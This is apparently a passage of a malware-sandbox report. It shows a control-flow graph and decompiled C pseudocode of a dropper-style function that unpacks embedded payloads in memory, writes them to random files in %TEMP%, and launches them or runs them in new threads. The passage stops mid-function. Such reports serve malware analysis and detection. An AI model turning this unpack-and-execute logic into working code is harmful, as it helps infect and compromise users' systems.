                                                                                                                                                                                                                                                                            control_flow_graph 298 7b62b0-7b62c4 299 7b62ca-7b62ce 298->299 300 7b6c4e 298->300 299->300 302 7b62d4-7b62e0 299->302 301 7b6c51-7b6c54 300->301 302->300 303 7b62e6-7b62ed 302->303 303->300 304 7b62f3-7b6314 303->304 306 7b631a-7b631e 304->306 307 7b642e-7b6453 304->307 309 7b6343-7b6363 306->309 310 7b6320-7b633a 306->310 312 7b6459-7b645d 307->312 313 7b6c2f-7b6c36 307->313 314 7b6429 309->314 315 7b6369-7b6375 309->315 310->309 311 7b633c-7b633e 310->311 311->301 316 7b645f-7b6479 312->316 317 7b6482-7b64a2 312->317 318 7b6c38-7b6c42 313->318 319 7b6c44 313->319 314->307 315->314 320 7b637b-7b6384 315->320 316->317 321 7b647b-7b647d 316->321 323 7b64a8-7b64b4 317->323 324 7b65f3-7b65fc 317->324 318->300 319->300 320->314 322 7b638a-7b6393 320->322 321->301 322->314 327 7b6399-7b63a2 322->327 323->324 328 7b64ba-7b654c GetEnvironmentVariableA call 7b7d20 call 7b9730 GetTickCount GetTempFileNameA CreateFileA 323->328 325 7b65fe 324->325 326 7b6603-7b660f 324->326 325->326 329 7b6bdd-7b6be9 326->329 330 7b6615-7b6621 326->330 331 7b6410-7b6424 call 7b1ee0 327->331 332 7b63a4-7b63ca VirtualAlloc 327->332 328->324 353 7b6552-7b6586 WriteFile 328->353 338 7b6beb-7b6bf7 329->338 339 7b6c18-7b6c24 329->339 330->329 335 7b6627-7b6640 call 7b7250 330->335 345 7b6427 331->345 336 7b640e 332->336 337 7b63cc-7b63e4 call 7b6260 332->337 354 7b6642 335->354 355 7b6647-7b664e 335->355 336->345 356 7b63fd-7b6408 VirtualFree 337->356 357 7b63e6-7b63fa call 7b1ee0 337->357 338->339 344 7b6bf9-7b6c16 call 7ba360 338->344 346 7b6c2a 339->346 347 7b6c26 339->347 344->346 345->307 346->313 347->346 359 7b6588-7b6591 353->359 360 7b65dd-7b65e4 353->360 354->355 361 7b6752-7b675b 355->361 362 7b6654-7b6674 VirtualAlloc 355->362 356->336 357->356 359->360 366 7b6593-7b65c7 CloseHandle call 7b6c60 call 7b1e60 359->366 360->324 369 7b65e6-7b65ed CloseHandle 360->369 364 7b69ba-7b6a49 GetEnvironmentVariableA call 7b7d20 call 7b9730 GetTickCount GetTempFileNameA CreateFileA 361->364 365 7b6761-7b6788 361->365 362->361 367 7b667a-7b6747 call 7b7b70 call 7b97a0 CreateThread CloseHandle 362->367 399 7b6a4f-7b6a75 364->399 400 7b6bd6 364->400 370 7b6858-7b6864 call 7b2070 365->370 371 7b678e-7b67c0 VirtualAlloc 365->371 397 7b65c9-7b65d0 call 7b74a0 ExitProcess 366->397 398 7b65d8 call 7b6cf0 366->398 367->361 369->324 386 7b686a-7b6871 370->386 376 7b6856 371->376 377 7b67c6-7b67e7 call 7b6260 371->377 376->386 395 7b67e9-7b6807 call 7b2070 377->395 396 7b6842-7b6850 VirtualFree 377->396 387 7b69b0 386->387 388 7b6877-7b687e 386->388 387->364 393 7b6880-7b6891 call 7b73c0 388->393 394 7b6894-7b689d 388->394 393->394 402 7b698a-7b6993 394->402 403 7b68a3-7b68c8 call 7b97a0 394->403 395->396 423 7b6809-7b683a VirtualAlloc call 7b7b70 395->423 396->376 398->360 407 7b6a7b-7b6aad VirtualAlloc 399->407 408 7b6b1e-7b6b3c WriteFile 399->408 400->329 411 7b69a9 402->411 412 7b6995-7b69a6 call 7b2510 402->412 427 7b68ca-7b68e7 403->427 428 7b68e9-7b690d VirtualAlloc 403->428 409 7b6aaf-7b6ad0 call 7b6260 407->409 410 7b6b1c 407->410 414 7b6b42-7b6b49 408->414 430 7b6b08-7b6b16 VirtualFree 409->430 431 7b6ad2-7b6b02 WriteFile 409->431 410->414 411->387 412->411 420 7b6b4b-7b6b57 414->420 421 7b6bc9-7b6bd0 CloseHandle 414->421 420->421 426 7b6b59-7b6b82 CloseHandle call 7b1e60 420->426 421->400 434 7b683f 423->434 439 7b6bc7 426->439 440 7b6b84-7b6b8b 426->440 433 7b6934-7b693d 427->433 428->433 435 7b690f-7b6931 call 7b7b70 428->435 430->410 431->430 433->402 436 7b693f-7b6984 CreateThread CloseHandle 433->436 434->396 435->433 436->402 439->400 442 7b6b8d-7b6b9e call 7b73c0 440->442 443 7b6ba1-7b6baa 440->443 442->443 444 7b6bac-7b6bbd call 7b2510 443->444 445 7b6bc0 443->445 444->445 445->439
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B62B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				signed int _v13;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				void _v36;
                                                                                                                                                                                                                                                                            				void* _v40;
                                                                                                                                                                                                                                                                            				long _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				void* _v52;
                                                                                                                                                                                                                                                                            				long _v56;
                                                                                                                                                                                                                                                                            				void _v60;
                                                                                                                                                                                                                                                                            				char _v324;
                                                                                                                                                                                                                                                                            				void* _v328;
                                                                                                                                                                                                                                                                            				char _v340;
                                                                                                                                                                                                                                                                            				char _v604;
                                                                                                                                                                                                                                                                            				int _v608;
                                                                                                                                                                                                                                                                            				long _v612;
                                                                                                                                                                                                                                                                            				signed int _v616;
                                                                                                                                                                                                                                                                            				void* _v620;
                                                                                                                                                                                                                                                                            				void* _v624;
                                                                                                                                                                                                                                                                            				void* _v628;
                                                                                                                                                                                                                                                                            				int _v632;
                                                                                                                                                                                                                                                                            				signed int _v636;
                                                                                                                                                                                                                                                                            				long _v640;
                                                                                                                                                                                                                                                                            				void* _v644;
                                                                                                                                                                                                                                                                            				void* _v648;
                                                                                                                                                                                                                                                                            				void* _v652;
                                                                                                                                                                                                                                                                            				char _v916;
                                                                                                                                                                                                                                                                            				void* _v920;
                                                                                                                                                                                                                                                                            				char _v932;
                                                                                                                                                                                                                                                                            				char _v1196;
                                                                                                                                                                                                                                                                            				long _v1200;
                                                                                                                                                                                                                                                                            				int _v1204;
                                                                                                                                                                                                                                                                            				long _v1208;
                                                                                                                                                                                                                                                                            				void* _v1212;
                                                                                                                                                                                                                                                                            				long _v1216;
                                                                                                                                                                                                                                                                            				signed int _v1220;
                                                                                                                                                                                                                                                                            				void* _v1224;
                                                                                                                                                                                                                                                                            				void* _v1228;
                                                                                                                                                                                                                                                                            				intOrPtr _t317;
                                                                                                                                                                                                                                                                            				signed char _t321;
                                                                                                                                                                                                                                                                            				void* _t333;
                                                                                                                                                                                                                                                                            				signed int _t340;
                                                                                                                                                                                                                                                                            				void* _t349;
                                                                                                                                                                                                                                                                            				signed int _t355;
                                                                                                                                                                                                                                                                            				void* _t361;
                                                                                                                                                                                                                                                                            				void* _t368;
                                                                                                                                                                                                                                                                            				void* _t378;
                                                                                                                                                                                                                                                                            				void* _t381;
                                                                                                                                                                                                                                                                            				signed int _t383;
                                                                                                                                                                                                                                                                            				void* _t386;
                                                                                                                                                                                                                                                                            				void* _t393;
                                                                                                                                                                                                                                                                            				int _t415;
                                                                                                                                                                                                                                                                            				signed int _t421;
                                                                                                                                                                                                                                                                            				signed int _t428;
                                                                                                                                                                                                                                                                            				signed char _t433;
                                                                                                                                                                                                                                                                            				void* _t439;
                                                                                                                                                                                                                                                                            				signed char _t442;
                                                                                                                                                                                                                                                                            				void* _t448;
                                                                                                                                                                                                                                                                            				signed int _t452;
                                                                                                                                                                                                                                                                            				intOrPtr _t455;
                                                                                                                                                                                                                                                                            				void* _t465;
                                                                                                                                                                                                                                                                            				void* _t472;
                                                                                                                                                                                                                                                                            				void* _t473;
                                                                                                                                                                                                                                                                            				void* _t508;
                                                                                                                                                                                                                                                                            				void* _t509;
                                                                                                                                                                                                                                                                            				void* _t528;
                                                                                                                                                                                                                                                                            				void* _t529;
                                                                                                                                                                                                                                                                            				void* _t539;
                                                                                                                                                                                                                                                                            				void* _t549;
                                                                                                                                                                                                                                                                            				void* _t550;
                                                                                                                                                                                                                                                                            				void* _t551;
                                                                                                                                                                                                                                                                            				void* _t563;
                                                                                                                                                                                                                                                                            				void* _t598;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L99:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 =  *_a4;
                                                                                                                                                                                                                                                                            					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                            						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                            							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                                                            								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                            								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x7be270; // 0x1
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									L22:
                                                                                                                                                                                                                                                                            									_t428 = _v24 + 1;
                                                                                                                                                                                                                                                                            									__eflags = _t428;
                                                                                                                                                                                                                                                                            									_v24 = _t428;
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x7be284; // 0x1
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									goto L22;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t508 = _v20;
                                                                                                                                                                                                                                                                            								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                            								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            									goto L22;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags =  *0x7c435d & 0x000000ff;
                                                                                                                                                                                                                                                                            								if(( *0x7c435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									goto L22;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t509 = _v20;
                                                                                                                                                                                                                                                                            								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            									_t433 = E007B1EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                            									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                            									L21:
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                            								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                            								__eflags = _v40;
                                                                                                                                                                                                                                                                            								if(_v40 == 0) {
                                                                                                                                                                                                                                                                            									L19:
                                                                                                                                                                                                                                                                            									goto L21;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t439 = E007B6260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                            								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                            								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                            									_t442 = E007B1EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                            									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                            								goto L19;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v36 =  *_v20;
                                                                                                                                                                                                                                                                            								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                            								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									return 0;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v13 = 0;
                                                                                                                                                                                                                                                                            						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                            						_v48 = 0;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                            							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _v48;
                                                                                                                                                                                                                                                                            							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                            								L29:
                                                                                                                                                                                                                                                                            								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                            								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x7be274; // 0x2
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									L39:
                                                                                                                                                                                                                                                                            									_t448 = _v20;
                                                                                                                                                                                                                                                                            									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                            									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x7be270; // 0x1
                                                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                                                            											L90:
                                                                                                                                                                                                                                                                            											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x7be278; // 0x3
                                                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                                                            												L93:
                                                                                                                                                                                                                                                                            												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x7be27c; // 0x4
                                                                                                                                                                                                                                                                            												if(__eflags == 0) {
                                                                                                                                                                                                                                                                            													_v13 = 1;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												L95:
                                                                                                                                                                                                                                                                            												L24:
                                                                                                                                                                                                                                                                            												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                            												__eflags = _t452;
                                                                                                                                                                                                                                                                            												_v48 = _t452;
                                                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x7be288; // 0x2
                                                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                                                            												goto L93;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t317 =  *0x7be28c; // 0x7c3f88
                                                                                                                                                                                                                                                                            											_t455 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            											E007BA360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                            											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                            											goto L95;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x7be284; // 0x1
                                                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                                                            											goto L90;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_t321 = E007B7250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                            										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                            										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            											_t528 = _v20;
                                                                                                                                                                                                                                                                            											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                            											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                            												L48:
                                                                                                                                                                                                                                                                            												_t529 = _v20;
                                                                                                                                                                                                                                                                            												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                            												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                            													E007B7D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                            													E007B9730( &_v932, 4);
                                                                                                                                                                                                                                                                            													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                            													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                            													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                            													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                            													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                            														L89:
                                                                                                                                                                                                                                                                            														goto L24;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_v1200 = 0;
                                                                                                                                                                                                                                                                            													_v1204 = 0;
                                                                                                                                                                                                                                                                            													_v1208 = _v56;
                                                                                                                                                                                                                                                                            													_t333 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                            														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                            														__eflags = _v1212;
                                                                                                                                                                                                                                                                            														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                            															_t349 = E007B6260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                            															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                            															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                            																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                            																_v1208 = _v1216;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													__eflags = _v1204;
                                                                                                                                                                                                                                                                            													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                            														L88:
                                                                                                                                                                                                                                                                            														CloseHandle(_v920);
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                            														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                            															goto L88;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														CloseHandle(_v920);
                                                                                                                                                                                                                                                                            														_t340 = E007B1E60( &_v916);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            														_v1220 = _t340;
                                                                                                                                                                                                                                                                            														__eflags = _v1220;
                                                                                                                                                                                                                                                                            														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                            															_t465 = _v20;
                                                                                                                                                                                                                                                                            															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                            															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                            																E007B73C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															_t539 = _v20;
                                                                                                                                                                                                                                                                            															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                            															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            																E007B2510(_v1220, 0x7be290);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															_v8 = 1;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													goto L89;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												_v636 = 0;
                                                                                                                                                                                                                                                                            												_v632 = 0;
                                                                                                                                                                                                                                                                            												_v640 = 0;
                                                                                                                                                                                                                                                                            												_t472 = _v20;
                                                                                                                                                                                                                                                                            												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            													_t355 = E007B2070(_v52);
                                                                                                                                                                                                                                                                            													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            													_v636 = _t355;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                            													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            													_v644 = _t378;
                                                                                                                                                                                                                                                                            													__eflags = _v644;
                                                                                                                                                                                                                                                                            													if(_v644 != 0) {
                                                                                                                                                                                                                                                                            														_t381 = E007B6260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                            														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                            														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                            															_t383 = E007B2070(_v644); // executed
                                                                                                                                                                                                                                                                            															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            															_v636 = _t383;
                                                                                                                                                                                                                                                                            															_t563 = _v20;
                                                                                                                                                                                                                                                                            															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                            															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            																_v632 = _t386;
                                                                                                                                                                                                                                                                            																E007B7B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												__eflags = _v636;
                                                                                                                                                                                                                                                                            												if(_v636 != 0) {
                                                                                                                                                                                                                                                                            													_t473 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                            													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                            														E007B73C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_t549 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                            													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            														_t361 = E007B97A0(0x10);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            														_v1228 = _t361;
                                                                                                                                                                                                                                                                            														_v648 = _v1228;
                                                                                                                                                                                                                                                                            														_t551 = _v20;
                                                                                                                                                                                                                                                                            														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                            															__eflags =  *_v648;
                                                                                                                                                                                                                                                                            															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                            																E007B7B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                            															 *_v648 = _v632;
                                                                                                                                                                                                                                                                            															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														__eflags =  *_v648;
                                                                                                                                                                                                                                                                            														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                            															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                            															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                            															_t368 = CreateThread(0, 0, E007B77B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                            															_v652 = _t368;
                                                                                                                                                                                                                                                                            															CloseHandle(_v652);
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_t550 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                            													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            														E007B2510(_v636, 0x7be290);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_v8 = 1;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												goto L24;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                            											__eflags = _v620;
                                                                                                                                                                                                                                                                            											if(_v620 == 0) {
                                                                                                                                                                                                                                                                            												goto L48;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											E007B7B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                            											_t393 = E007B97A0(0x20);
                                                                                                                                                                                                                                                                            											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                            											_v1224 = _t393;
                                                                                                                                                                                                                                                                            											_v624 = _v1224;
                                                                                                                                                                                                                                                                            											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                            											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                            											_v628 = CreateThread(0, 0, E007B6DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                            											CloseHandle(_v628);
                                                                                                                                                                                                                                                                            											goto L24;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L24;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L24;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x7be284; // 0x1
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									goto L39;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                            								E007B7D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                            								E007B9730( &_v340, 4);
                                                                                                                                                                                                                                                                            								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                            								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                            								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                            								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                            								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                            									goto L39;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v608 = 0;
                                                                                                                                                                                                                                                                            								_v612 = 0;
                                                                                                                                                                                                                                                                            								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                            								__eflags = _t415;
                                                                                                                                                                                                                                                                            								if(_t415 == 0) {
                                                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                                                            									__eflags = _v608;
                                                                                                                                                                                                                                                                            									if(_v608 == 0) {
